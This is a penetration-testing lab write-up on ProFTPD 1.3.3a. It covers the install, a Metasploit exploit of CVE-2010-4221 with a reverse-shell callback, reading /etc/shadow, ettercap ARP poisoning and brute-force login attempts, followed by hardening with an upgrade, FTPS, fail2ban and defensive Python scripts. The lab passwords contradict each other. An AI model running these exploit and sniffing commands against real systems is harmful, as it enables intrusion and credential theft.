[1] The source code of the older version of ProFTPD server (1.3.3a) was downloaded from the ProFTPD source code repository located at ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.3a.tar.bz2.
The commands used were (without the hash sign) (proftpd, 2011):
# cd /usr/local/src
# wget -c 'ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.3a.tar.bz2'
[2] For compilation of the source code, development libraries and compilers need to be installed on the CentOS machine. They were installed using the following command (proftpd, 2013):
# yum -y groupinstall 'Development tools'
[2] The ProFTP server runs as a non-privileged user on the Linux system for security reasons. A group called ftpd was created and then a user called ftpd was also created that belonged to the ftpd group. The following commands were used:
Command Used | Purpose
groupadd ftpd | Creates a new group called ftpd and populates the /etc/group file.
useradd -g ftpd ftpd | Creates a new user called ftpd that has ftpd as its primary group (specified by the -g parameter) and populates the /etc/passwd file.
[3] Once the user and group ftpd were added, the next step was to compile the source code of the ProFTP server to produce the proftpd binary, which supports FTP (File Transfer Protocol). The following commands were used to achieve this (proftpd, 2011):
Command Used | Purpose
cd /usr/local/src | Change directory to /usr/local/src, where the source code of ProFTPD was downloaded.
tar -jxf proftpd-1.3.3a.tar.bz2 | Uncompresses the proftpd-1.3.3a.tar.bz2 BZIP2 archive. The command options are as follows: -j (the input file is in BZIP2 format), -x (extract), -f (this argument is followed by the compressed filename).
cd proftpd-1.3.3a | Change directory into the uncompressed folder proftpd-1.3.3a.
install_user=ftpd install_group=ftpd ./configure --prefix=/usr --sysconfdir=/etc | Runs a shell script called configure in the current directory. This script checks the build dependencies and the architecture of the machine on which the software is going to be compiled. Its main task is to generate a file called “Makefile”, which contains the compilation and installation instructions read by the make command. The install_user and install_group variables tell the configure script that the user and group used by proftpd are ftpd and ftpd respectively. --prefix=/usr tells configure that the binaries should be installed under the /usr directory rather than /usr/local (the default). Finally, --sysconfdir=/etc tells configure that the configuration files should be installed in the /etc directory.
make | Compiles the binaries as per the instructions in the Makefile.
make install | Installs the compiled binaries, which include the ProFTPD daemon called proftpd.
[3] Once the binaries were compiled and installed, the location of proftpd was found using the following command:
# which proftpd
The version was also checked using the following command:
# /usr/sbin/proftpd -v
[4] The main configuration file of the proftpd server, proftpd.conf, which is located in /etc, was edited using the vi editor. The final configuration file looked like the following (Petersen, 2010). The configuration is heavily commented (comments start with the # sign) for explanation:
In the same file, the configuration block starting with <Anonymous ~ftp> and ending with </Anonymous>, and all the directives inside it, were commented out (by putting a hash sign in front of each line) to disable the anonymous FTP service on the proftpd server (Petersen, 2010).
The final configuration file only allows local Linux accounts/users (users defined in /etc/passwd) and chroots (restricts) them to their home directory so that they cannot break out of that directory.
[5] Since the proftpd daemon is configured to support local Linux accounts and to chroot each user to his/her home directory, a new user called prithak with password password was added to the Linux system for testing. The following commands were used:
# useradd prithak
# passwd prithak (enter the password prithak twice)
Similarly, another user called daniel was also added to the system. Finally, we have the following users on the system:
Username | Password
prithak | 1234qwer
daniel | 1a2b3c
chintan | a1b2c3d4
[6] The ProFTP server (192.168.79.135) was started in debugging mode and was accessed from the Windows machine (192.168.79.1) using the Windows built-in ftp command. The user prithak (having password prithak) was able to log into the ProFTPD server successfully, and at the same time the proftpd server produced debugging logs on standard output confirming the details of the login (Petersen, 2010).
The proftpd daemon was started using the following command line options (Petersen, 2010):
proftpd -n -d 4 -c /etc/proftpd.conf --ipv4
The options are as follows:
-n : Runs the proftpd process in standalone mode (it must be configured as such in the configuration file), but does not background the process or disassociate it from the controlling tty. Additionally, all output (log or debug messages) is sent to stderr rather than to the syslog mechanism.
-d 4 : Runs the proftpd server in debugging mode; the parameter 4 sets the verbosity of the logging to level 4.
-c /etc/proftpd.conf : Instructs the proftpd daemon to read the configuration file located at /etc/proftpd.conf.
--ipv4 : Instructs the proftpd daemon to listen only on IPv4 addresses, i.e. IPv6 is disabled (if present).
[7] To ensure that the ProFTP server running on 192.168.79.135 starts every time Linux is restarted, the initialization script (init script) that comes with the ProFTP source was copied to the CentOS SysV init script directory (/etc/rc.d/init.d). Then the script was made executable. Finally, the proftpd service was turned on using the chkconfig command:
# cp /usr/local/src/proftpd-1.3.3a/contrib/dist/rpm/proftpd.init.d /etc/rc.d/init.d/proftpd
# chmod 775 /etc/rc.d/init.d/proftpd
# chkconfig proftpd on
RECONNAISSANCE, FOOTPRINTING and EXPLOITATION
[1] RECONNAISSANCE and FOOTPRINTING
The first step in every vulnerability assessment is to find out what services are running and the version of each service; this is called reconnaissance and footprinting. To complete this step a port scan against the target machine should be launched. Following the same principle, the nmap port scanner was launched against the machine using the following parameters (EC-Council, 2010):
root@bt:~# nmap -sS -PN -n -sV -sC 192.168.79.135
The Nmap scan result indicated that the remote machine has two open ports: 22 (SSH) and 21 (FTP). Also, the version of the FTP server running on the remote machine is ProFTPD 1.3.3a and that of SSH is OpenSSH 5.3. The SSH server only supports SSH protocol version 2.0.
[2] BUFFER OVERFLOW ATTACK AGAINST THE PROFTPD SERVICE
When known vulnerabilities for ProFTPD 1.3.3a were searched for on the internet, the following results were obtained:
The vulnerability “CVE-2010-4221” was identified as affecting the version of ProFTPD (1.3.3a) that we were running. According to the site, “Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.”
Similarly, when exploits for CVE-2010-4221 were searched for on the internet, the search led to the following Metasploit exploit: “ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)”. The screenshot of the same is shown below:
To exploit the remote machine running the vulnerable version of ProFTPD, metasploit was launched using the following commands on the Backtrack Linux system (Kennedy et al., 2011):
root@bt:~# cd /opt/metasploit/msf3
root@bt:/opt/metasploit/msf3# ./msfconsole
The exploit for the vulnerable version of ProFTPD running on 192.168.79.135 was loaded using the following commands (Kennedy et al., 2011):
msf > use exploit/linux/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > set RHOST 192.168.79.135
RHOST => 192.168.79.135
msf exploit(proftp_telnet_iac) > set payload linux/x86/shell_reverse_tcp
msf exploit(proftp_telnet_iac) > set LHOST 192.168.79.144
LHOST => 192.168.79.144
msf exploit(proftp_telnet_iac) > exploit -j
Metasploit Command | Description
use exploit/linux/ftp/proftp_telnet_iac | Loads the proftp_telnet_iac exploit into the current context.
set RHOST 192.168.79.135 | The target host of the exploit, i.e. the IP address of the vulnerable machine.
set payload linux/x86/shell_reverse_tcp | The shellcode that will be executed after successful exploitation. Here the reverse shell payload is chosen; it connects back to the attacker after the exploit succeeds. The IP to which it should connect back is set by the LHOST parameter.
set LHOST 192.168.79.144 | The IP address of the attacker.
exploit -j | Launch the exploit as a background session.
As a result of successful exploitation, a reverse shell was obtained on the 192.168.79.135 (ProFTP) server. A new session was created for the shell, which could be listed using the “session -l” command in the metasploit console.
To interact with the session, the “session -i 1” command was used. To check the privilege level of the user who triggered the reverse shell, the following commands were used:
1. id: This command prints the effective user id of the user. The output showed that we had uid 0 and gid 0, i.e. we were the root user.
2. whoami: This command prints the user-friendly name of the current user. The output of this command also confirmed that we had root access on the machine.
Since we had the privileges of the super user (root), we were also able to dump the /etc/shadow file, which contains the password hashes of the various users in the system and is only readable/writeable by the root user. The following screenshot shows the interaction:
[2] Brute Force and Password re-use attack against the ProFTP Server
To carry out a password brute force attack against the ProFTP server, the following Python script was written. This script tries to brute force the passwords of the users prithak, chintan and daniel. The default password file that comes with Backtrack is used as the password database file.
Using the above Python script the passwords of the FTP users prithak, chintan and daniel were brute forced and obtained successfully. The following screenshot shows the passwords obtained:
Since most systems use the same username and password for multiple services, the usernames and passwords obtained from the previous attacks were used against the SSH server running on the same server. This attack is also called a “password reuse attack” (Harper, 2011). The password reuse attack was successful and the credentials obtained above were also valid for SSH login. The following screenshot shows the successful SSH login:
[3] ARP Poisoning and Password Sniffing Attack
Since the FTP protocol sends usernames and passwords in clear text, it is susceptible to password sniffing attacks. In this attack the following machines are involved:
192.168.79.135 ProFTP Server (FTP Server)
192.168.79.144 Backtrack (Attacker)
192.168.79.150 Windows XP (FTP Client)
The following screenshot shows the Address Resolution Protocol table in the Windows XP host before the ARP poisoning attack is launched:
It can be seen that all the hosts have different MAC addresses associated with them. Now, since the attacker is on the same LAN segment as the FTP server and the FTP client, it is possible for the attacker to launch an ARP poisoning attack so that he can sit in the middle of the FTP exchanges and sniff the password. To do this the following steps were performed on the attacker's machine:
(1) IP forwarding was enabled on the attacker's machine so that it can route the traffic between the FTP Server and the FTP Client. This is done using the following command (Anon, 2008):
# echo 1 > /proc/sys/net/ipv4/ip_forward
(2) The Ettercap utility was used to launch an ARP poisoning attack against both 192.168.79.150 [Windows XP (FTP Client)] and 192.168.79.135 [ProFTP Server (FTP Server)]. The following command was used (Anon, 2008):
# ettercap --iface eth4 --text --quiet --mitm arp /192.168.79.150/ /192.168.79.135/
(3) The following screenshot shows the ARP table on the Windows XP machine before and after the attack was launched:
(4) Now when the client logs into the FTP Server the ettercap utility grabs the password and prints it.
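The before/after ARP tables described above are also what a defender on the client side can check for. The following script is an added example, not part of the original post: it compares two constructed snapshots of Windows "arp -a" output and flags an IP whose MAC address changed between snapshots, or several IPs that now share one MAC, which is exactly what the screenshots show after the poisoning. The IP addresses are the post's; the MAC values and the interface index are constructed for this example.

```python
"""Added example (not from the original post): detect the ARP cache change the
post shows in its before/after screenshots of the Windows XP client.

Two constructed snapshots of Windows 'arp -a' output are compared. An IP whose
MAC address changed between snapshots, or several IPs that now resolve to the
same MAC, is the signature of the poisoning the post describes. The IP
addresses are the post's; the MAC values and the interface index are
constructed for this example.
"""
import re

# One row of 'arp -a' output: "  192.168.79.135   00-0c-29-11-22-33   dynamic"
ARP_ROW = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>[0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(?P<type>\w+)",
    re.IGNORECASE,
)

# Constructed snapshot: every host has its own MAC (the "before" screenshot).
ARP_BEFORE = """\
Interface: 192.168.79.150 --- 0x2
  Internet Address      Physical Address      Type
  192.168.79.2          00-50-56-e1-00-01     dynamic
  192.168.79.135        00-0c-29-11-22-33     dynamic
  192.168.79.144        00-0c-29-aa-bb-cc     dynamic
"""

# Constructed snapshot after poisoning: the FTP server's IP now carries the
# attacker's MAC, so two IPs share one hardware address.
ARP_AFTER = """\
Interface: 192.168.79.150 --- 0x2
  Internet Address      Physical Address      Type
  192.168.79.2          00-50-56-e1-00-01     dynamic
  192.168.79.135        00-0c-29-aa-bb-cc     dynamic
  192.168.79.144        00-0c-29-aa-bb-cc     dynamic
"""


def parse_arp_table(text):
    """Map IP address -> MAC address (lowercase) from 'arp -a' output."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_anomalies(before, after):
    """Compare two IP->MAC tables and return a list of findings.

    ("mac_changed", ip, old_mac, new_mac): a known IP moved to another MAC.
    ("shared_mac", mac, [ips]): several IPs resolve to the same MAC.
    """
    findings = []
    for ip, mac in sorted(after.items()):
        old = before.get(ip)
        if old is not None and old != mac:
            findings.append(("mac_changed", ip, old, mac))
    by_mac = {}
    for ip, mac in after.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(("shared_mac", mac, sorted(ips)))
    return findings


def check_snapshots(before_text=ARP_BEFORE, after_text=ARP_AFTER):
    """Parse both snapshots and return the anomalies between them."""
    return find_anomalies(parse_arp_table(before_text), parse_arp_table(after_text))


if __name__ == "__main__":
    for finding in check_snapshots():
        print(finding)
```

On a real client the two snapshots would come from running "arp -a" periodically; a static ARP entry for the FTP server and gateway, or switch-side dynamic ARP inspection, are the usual ways to act on such a finding.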
COUNTERMEASURES
[1] COUNTERMEASURE AGAINST BUFFER OVERFLOW EXPLOIT
Since an older version of ProFTPD is being run on the system, the most effective countermeasure is to install the latest version of the same software. Another countermeasure is to install a more secure FTP server that has a very good security track record; the pureftpd server seems to have a better security track record than the proftpd server.
To apply the countermeasure we chose to upgrade ProFTPD to the latest version. This was done following similar steps to those used to install the older version of ProFTPD. The steps used were:
· The running version of the proftpd server was stopped using the following command:
# service proftpd stop
· The older version of the ProFTPD server was removed by entering its source directory and using the “make deinstall” command:
# cd /usr/local/src/proftpd-1.3.3a
# make deinstall
· The latest version of the proftpd source code was downloaded and its MD5 checksum verified using the md5sum command. The following screenshot shows the interaction:
· The newer version of ProFTPD was compiled and installed using the following commands (Proftpd, 2011):
# tar zxvf proftpd-1.3.5rc2.tar.gz
# cd proftpd-1.3.5rc2
# install_user=ftpd install_group=ftpd ./configure --prefix=/usr --sysconfdir=/etc --with-modules=mod_tls
# make
# make install
[ N.B.: All these commands and their usage have been explained already when the older version of ProFTPD was installed. The --with-modules=mod_tls option enables FTP over SSL/TLS (FTPS) protocol support. ]
· When the version of proftpd was checked it came out to be ProFTPD Version 1.3.5rc2.
· The latest version of proftpd was started and then the lsof command was used to verify that the FTP server was running:
It was also possible to log in to the FTP server using the same usernames and passwords that were used earlier, which proved that the upgraded FTP service was working. When the same Metasploit exploit used previously was launched against this ProFTPD server it failed, verifying that the service was patched. Also, at the time of writing no known exploits (local or remote) exist for the ProFTPD server version 1.3.5-rc2 that we are running.
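The checksum step in the upgrade above is shown only as a screenshot. The following is an added example, not the post's code: it performs the same comparison in Python, either against a digest given directly or against an entry in a sums file of the form md5sum and sha256sum write, and prefers SHA-256 where one is published. The demo builds a placeholder archive with constructed content in a temporary directory, so the digests in it belong to that content and not to any ProFTPD release.

```python
"""Added example (not from the original post): verify a downloaded source
archive against a published digest before building it.

The post verifies the proftpd-1.3.5rc2 tarball with md5sum (shown there only as
a screenshot). This helper does the same comparison in Python, accepts a digest
given directly or looked up in a sums file in the format md5sum and sha256sum
write, and prefers SHA-256 when one is published. The demo builds a placeholder
archive in a temporary directory with constructed content, so the digests used
are those of that content, not of any ProFTPD release.
"""
import hashlib
import hmac
import os
import shutil
import tempfile


def file_digest(path, algo="sha256", chunk_size=65536):
    """Return the hex digest of a file, read in chunks so large tarballs fit."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_checksum(path, expected, algo="sha256"):
    """True when the file's digest equals expected (case-insensitive).

    A missing file raises FileNotFoundError rather than returning False, so a
    failed download is never reported as a mere checksum mismatch.
    """
    actual = file_digest(path, algo)
    return hmac.compare_digest(actual.lower(), expected.strip().lower())


def verify_from_sums_file(path, sums_path, algo="sha256"):
    """Look the file up by basename in a '<digest>  <name>' sums file."""
    name = os.path.basename(path)
    with open(sums_path) as fh:
        for line in fh:
            parts = line.split()
            if len(parts) == 2 and parts[1].lstrip("*") == name:
                return verify_checksum(path, parts[0], algo)
    raise ValueError("no entry for %s in %s" % (name, sums_path))


# Real digests of the constructed content b"hello\n" (not of any release).
SHA256_HELLO = "5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03"
MD5_HELLO = "b1946ac92492d2347c6235b4d2611184"


def demo():
    """Build a placeholder archive and exercise the checks; returns the results."""
    tmpdir = tempfile.mkdtemp()
    try:
        archive = os.path.join(tmpdir, "proftpd-PLACEHOLDER.tar.gz")
        with open(archive, "wb") as fh:
            fh.write(b"hello\n")  # constructed stand-in for the tarball
        sums = os.path.join(tmpdir, "SHA256SUMS")
        with open(sums, "w") as fh:
            fh.write("%s  proftpd-PLACEHOLDER.tar.gz\n" % SHA256_HELLO)
        results = {
            "sha256_ok": verify_checksum(archive, SHA256_HELLO),
            "md5_ok": verify_checksum(archive, MD5_HELLO, "md5"),
            "sums_file_ok": verify_from_sums_file(archive, sums),
        }
        with open(archive, "ab") as fh:
            fh.write(b"\x00")  # simulate a corrupted or tampered download
        results["tampered_detected"] = not verify_checksum(archive, SHA256_HELLO)
        return results
    finally:
        shutil.rmtree(tmpdir)


if __name__ == "__main__":
    for check, passed in demo().items():
        print("%-17s %s" % (check, "OK" if passed else "FAIL"))
```

The expected digest must come from a source other than the download itself (the project's signed release announcement or a checksum file fetched over a separate channel), otherwise a tampered mirror can simply publish a matching sum.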
[2] COUNTERMEASURE AGAINST PASSWORD SNIFFING AND PASSWORD RE-USE ATTACK
The FTP protocol can be secured by using FTP over SSL (FTPS). The following steps can be performed to enable FTPS:
(1) Generate SSL/TLS certificates using the OpenSSL utility that comes with Linux (Falko, 2011):
# mkdir /etc/ssl_certs/
# openssl req -new -x509 -days 730 -nodes -out /etc/ssl_certs/proftpd.cert.pem -keyout /etc/ssl_certs/proftpd.key.pem
The -days 730 option ensures that the certificate is valid for 730 days, or two years.
(2) The ProFTPD server was configured to support the FTPS protocol by editing the /etc/proftpd.conf configuration file. Also, the plaintext FTP protocol was disabled and FTPS was enforced, so ProFTPD now rejects plaintext FTP connections. The following screenshot shows the added lines with comments and explanation (Falko, 2011):
(3) Once the configuration was completed, the ProFTPD daemon was restarted using the “service proftpd restart” command. Now when the Windows 7 built-in FTP.EXE client was used to connect to the server using the plaintext FTP protocol, the server rejected the connection with the error message “550 SSL/TLS required on the control channel”.
(4) To test the login, the FileZilla FTP client was installed and it was able to log in to the ProFTPD server successfully using SSL/TLS. However, a warning message related to the certificate was shown, because the certificate is self-signed. Once the certificate was accepted, there were no errors on subsequent logins.
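Both configuration changes in this post, commenting out the <Anonymous ~ftp> block and chrooting local users (section [4] of the installation) and enforcing FTPS with mod_tls (step (2) above), are shown only as screenshots. The following is an added example, not the author's configuration or ProFTPD's own code: a small checker that parses a proftpd.conf and reports whether anonymous access is disabled, whether DefaultRoot ~ chroots users, and whether TLSEngine and TLSRequired are both on. The directive and block names are ProFTPD's real ones; the two sample configurations are constructed for the example, and the parsing rules (one directive per line, lines starting with # are comments, <Name ...>/</Name> delimit blocks) are assumptions that match the post's description of the file.

```python
"""Added example (not from the original post): audit a proftpd.conf for the
hardening points the post applies by hand.

The post's configuration is shown only in screenshots: it comments out the
<Anonymous ~ftp> block, chroots local users to their home directory with
DefaultRoot ~, and later enforces FTPS with mod_tls. This checker parses a
configuration text and reports those three points, so the result can be
verified before a restart. The directive and block names are ProFTPD's own;
both sample configurations are constructed for this example and are not the
author's files. Parsing rules assumed: one directive per line, a line whose
first non-blank character is '#' is a comment, and <Name ...> / </Name> open
and close blocks.
"""
import re

BLOCK_OPEN = re.compile(r"^<(\w+)(?:\s+[^>]*)?>$")
BLOCK_CLOSE = re.compile(r"^</(\w+)>$")

# Constructed: a stock-style configuration before hardening.
WEAK_CONF = """\
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
Port 21
User ftpd
Group ftpd
<Anonymous ~ftp>
  User ftp
  Group ftp
  UserAlias anonymous ftp
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>
"""

# Constructed: local users only, chrooted, plaintext FTP refused.
HARDENED_CONF = """\
ServerName "ProFTPD Server"
ServerType standalone
DefaultServer on
Port 21
User ftpd
Group ftpd
# Restrict every local user to their home directory
DefaultRoot ~
# Anonymous FTP disabled: the whole block is commented out
# <Anonymous ~ftp>
#   User ftp
# </Anonymous>
<IfModule mod_tls.c>
  TLSEngine on
  TLSLog /var/log/proftpd/tls.log
  TLSProtocol TLSv1 TLSv1.1 TLSv1.2
  TLSRSACertificateFile /etc/ssl_certs/proftpd.cert.pem
  TLSRSACertificateKeyFile /etc/ssl_certs/proftpd.key.pem
  TLSVerifyClient off
  # Require TLS on both the control and data channels
  TLSRequired on
</IfModule>
"""


def parse_conf(text):
    """Return (directives, blocks): active directives as (block_stack, name,
    value) tuples, and the list of block names that were opened."""
    directives, blocks, stack = [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank or commented out (how the post disables <Anonymous>)
        m = BLOCK_OPEN.match(line)
        if m:
            stack.append(m.group(1))
            blocks.append(m.group(1))
            continue
        m = BLOCK_CLOSE.match(line)
        if m:
            if not stack or stack[-1] != m.group(1):
                raise ValueError("unbalanced </%s>" % m.group(1))
            stack.pop()
            continue
        parts = line.split(None, 1)
        directives.append((tuple(stack), parts[0], parts[1] if len(parts) > 1 else ""))
    if stack:
        raise ValueError("unclosed block <%s>" % stack[-1])
    return directives, blocks


def audit(text):
    """Return a dict of hardening points; each value is True when met."""
    directives, blocks = parse_conf(text)
    chrooted = tls_engine = tls_required = False
    for stack, name, value in directives:
        if "Anonymous" in stack:
            continue  # settings inside the anonymous block are not server-wide
        lname, lvalue = name.lower(), value.lower()
        if lname == "defaultroot" and lvalue.split()[:1] == ["~"]:
            chrooted = True
        elif lname == "tlsengine":
            tls_engine = lvalue == "on"
        elif lname == "tlsrequired":
            tls_required = lvalue == "on"
    return {
        "anonymous_disabled": "Anonymous" not in blocks,
        "users_chrooted": chrooted,
        "ftps_enforced": tls_engine and tls_required,
    }


def is_hardened(text):
    """True only when every audited point passes."""
    return all(audit(text).values())


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf))
```

A check like this complements, rather than replaces, ProFTPD's own syntax test (proftpd -t); it answers the policy question (is plaintext FTP really refused?) that a syntax check does not.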
Also, the passwords used for the FTP server should be secure and strong. The FTP users should have their shell changed to /bin/false, which ensures that they cannot log in over SSH, telnet or TTY sessions. This was done using the following commands (Bauer, 2005); /bin/false is appended to /etc/shells because ProFTPD, by default, only accepts users whose login shell is listed in that file:
# chsh -s /bin/false prithak
# chsh -s /bin/false daniel
# chsh -s /bin/false chintan
# echo /bin/false >> /etc/shells
[3] COUNTERMEASURE AGAINST PASSWORD BRUTEFORCE ATTACK
To defend against password brute force attacks the following steps were taken:
1. Strong passwords were chosen and the users' passwords were changed. The following commands were used:
# passwd prithak (when prompted, the password alj234wkjw&82jlk2133 was entered twice)
# passwd chintan (when prompted, the password 234aj%2]32[maere was entered twice)
# passwd daniel (when prompted, the password ;8@#%2./ere$*.0* was entered twice)
2. The Fail2ban utility was installed and configured on the ProFTPD system. Fail2ban can detect and prevent password brute force attacks by blocking the attacker's IP address(es). It checks the proftpd log (/var/log/secure) and, based on its configuration, automatically inserts iptables firewall rule(s) to block the offending IP address. The following steps were taken to install and configure fail2ban with ProFTPD:
(a) Fail2ban was installed using the following commands (Selvaganeshan, 2010):
# rpm -ivh epel-release-6-8.noarch.rpm
# yum install -y fail2ban
(b) The /etc/fail2ban/jail.conf file was edited and the following parameters were changed (Selvaganeshan, 2010):
bantime = 600
maxretry = 4
The bantime defines the number of seconds to block the attacker's IP and the maxretry parameter is the number of failures allowed before the IP is blocked. So, in this case, if any IP has more than 4 failed logins then it is banned. Similarly, monitoring of ProFTPD logs was also enabled in the “proftpd-iptables” section:
(c) Then the fail2ban service was restarted using the following command:
# /etc/init.d/fail2ban restart
At the beginning no IP address was blocked by fail2ban via iptables; the rule set in the fail2ban-ProFTPD chain was empty, as shown below:
(d) When an FTP password brute force attack is carried out from IP address 192.168.79.222 (backtrack) against the ProFTPD server (192.168.79.135), the attack is detected and the attacker's IP address is blocked:
The iptables rule to block the IP 192.168.79.222, inserted by fail2ban, is highlighted below:
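The detection rule fail2ban applies in step 2 above (count failed logins per source IP within a time window, ban for bantime seconds once maxretry is reached) is easy to lose sight of behind the two configuration values. The following is an added example, not the post's code and not fail2ban itself: it replays constructed ProFTPD log lines in the shape the daemon writes through syslog to /var/log/secure, keeps a per-IP sliding window, and records the iptables commands such a ban would produce in the post's fail2ban-ProFTPD chain. The year (syslog timestamps carry none), the findtime of 600 seconds and the exact iptables rule form are assumptions.

```python
"""Added example (not from the original post): the detection rule the post
delegates to fail2ban, run over sample ProFTPD log lines.

fail2ban counts failed logins per source IP and bans a source once it reaches
maxretry failures within findtime seconds, for bantime seconds; the post sets
bantime = 600 and maxretry = 4 (findtime is assumed to stay at 600). This
script implements that sliding window in Python and records the iptables
commands such a ban would produce, using the post's fail2ban-ProFTPD chain
name (the exact rule form is an assumption). The log lines are constructed to
match the shape ProFTPD writes via syslog to /var/log/secure; syslog timestamps
carry no year, so 2013 is assumed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Failed-login messages (patterns constructed for this example).
FAIL_PATTERNS = [
    re.compile(r"\(\S+\[(?P<ip>[0-9.]+)\]\)[: -]+ USER \S+ \(Login failed\):"),
    re.compile(r"\(\S+\[(?P<ip>[0-9.]+)\]\)[: -]+ USER \S+: no such user found"),
]
TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) ")

# Constructed log excerpt: four failures from 192.168.79.222 within seconds,
# one failure and one success from the legitimate client, then a late retry.
SAMPLE_LOG = """\
May  7 10:12:01 ftpserver proftpd[2314]: ftpserver (192.168.79.222[192.168.79.222]) - USER prithak (Login failed): Incorrect password.
May  7 10:12:02 ftpserver proftpd[2315]: ftpserver (192.168.79.222[192.168.79.222]) - USER prithak (Login failed): Incorrect password.
May  7 10:12:03 ftpserver proftpd[2316]: ftpserver (192.168.79.222[192.168.79.222]) - USER admin: no such user found from 192.168.79.222 [192.168.79.222] to 192.168.79.135:21
May  7 10:12:04 ftpserver proftpd[2317]: ftpserver (192.168.79.150[192.168.79.150]) - USER daniel (Login failed): Incorrect password.
May  7 10:12:05 ftpserver proftpd[2318]: ftpserver (192.168.79.222[192.168.79.222]) - USER chintan (Login failed): Incorrect password.
May  7 10:12:06 ftpserver proftpd[2319]: ftpserver (192.168.79.222[192.168.79.222]) - USER chintan (Login failed): Incorrect password.
May  7 10:12:07 ftpserver proftpd[2320]: ftpserver (192.168.79.150[192.168.79.150]) - USER daniel: Login successful.
May  7 10:25:00 ftpserver proftpd[2400]: ftpserver (192.168.79.222[192.168.79.222]) - USER prithak (Login failed): Incorrect password.
"""


def parse_failure(line, year=2013):
    """Return (timestamp, source_ip) for a failed-login line, else None."""
    m = TS_RE.match(line)
    if not m:
        return None
    stamp = " ".join(m.group("ts").split())  # collapse the padded day
    ts = datetime.strptime("%d %s" % (year, stamp), "%Y %b %d %H:%M:%S")
    for pattern in FAIL_PATTERNS:
        f = pattern.search(line)
        if f:
            return ts, f.group("ip")
    return None


class Jail:
    """Per-IP sliding-window failure counter with timed bans."""

    def __init__(self, maxretry=4, findtime=600, bantime=600, chain="fail2ban-ProFTPD"):
        self.maxretry, self.findtime, self.bantime, self.chain = maxretry, findtime, bantime, chain
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures
        self.bans = {}                      # ip -> time the ban expires
        self.rules = []                     # iptables commands in the order issued

    def expire(self, now):
        """Lift bans whose bantime has elapsed; returns the IPs unbanned."""
        lifted = [ip for ip, until in self.bans.items() if until <= now]
        for ip in lifted:
            del self.bans[ip]
            self.rules.append("iptables -D %s -s %s -j REJECT" % (self.chain, ip))
        return lifted

    def observe(self, line):
        """Feed one log line; return the IP this line got banned, or None."""
        parsed = parse_failure(line)
        if parsed is None:
            return None
        ts, ip = parsed
        self.expire(ts)
        if ip in self.bans:
            return None  # already blocked; nothing more to do
        window = self.failures[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > self.findtime:
            window.popleft()  # drop failures older than findtime
        if len(window) >= self.maxretry:
            self.bans[ip] = ts + timedelta(seconds=self.bantime)
            window.clear()
            self.rules.append("iptables -I %s 1 -s %s -j REJECT" % (self.chain, ip))
            return ip
        return None


def run(log_text, **jail_kwargs):
    """Replay a log; return the jail and [(banned_ip, timestamp_text), ...]."""
    jail = Jail(**jail_kwargs)
    events = []
    for line in log_text.splitlines():
        banned = jail.observe(line)
        if banned:
            events.append((banned, line[:15]))
    return jail, events


if __name__ == "__main__":
    jail, events = run(SAMPLE_LOG)
    for ip, when in events:
        print("banned %s at %s" % (ip, when))
    for rule in jail.rules:
        print(rule)
```

Replaying the sample bans 192.168.79.222 on its fourth failure at 10:12:05, ignores its fifth attempt while banned, lifts the ban after 600 seconds, and never touches the legitimate client at 192.168.79.150, which failed only once.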
CONCLUSION
ProFTPD server was installed from source and attacked using buffer overflow exploit , password sniffing and password brute forcing attacks. Also, the service was secured using compulsory SSL/TLS certificates, Fail2ban intrusion detection system and by upgrading the service to the latest version.
REFERENCES
1. Falko, D. (2011). Setting Up ProFTPd + TLS On Debian Squeeze. Available at: http://www.howtoforge.com/setting-up-proftpd-tls-on-debian-squeeze (Accessed on: 7th May 2013).
2. Kennedy, D. (2011). Metasploit: The Penetration Tester's Guide. First Edition. No Starch Press.
3. Petersen, R. (2010). Fedora 14 Networking and Servers. Surfing Turtle Press.
4. Proftpd (2011). Compiling ProFTPD. Available at: http://www.proftpd.org/docs/howto/Compiling.html (Accessed on: 21st April 2013).
Authors: Chintan Gurjar and Prithak Sharma
This post is co-authored by Prithak Sharma, who is an IT Security Specialist interested in network security and pen-testing and can be contacted at prithak[at]gmail[dot]com. He runs his blog at prithak.blogspot.com.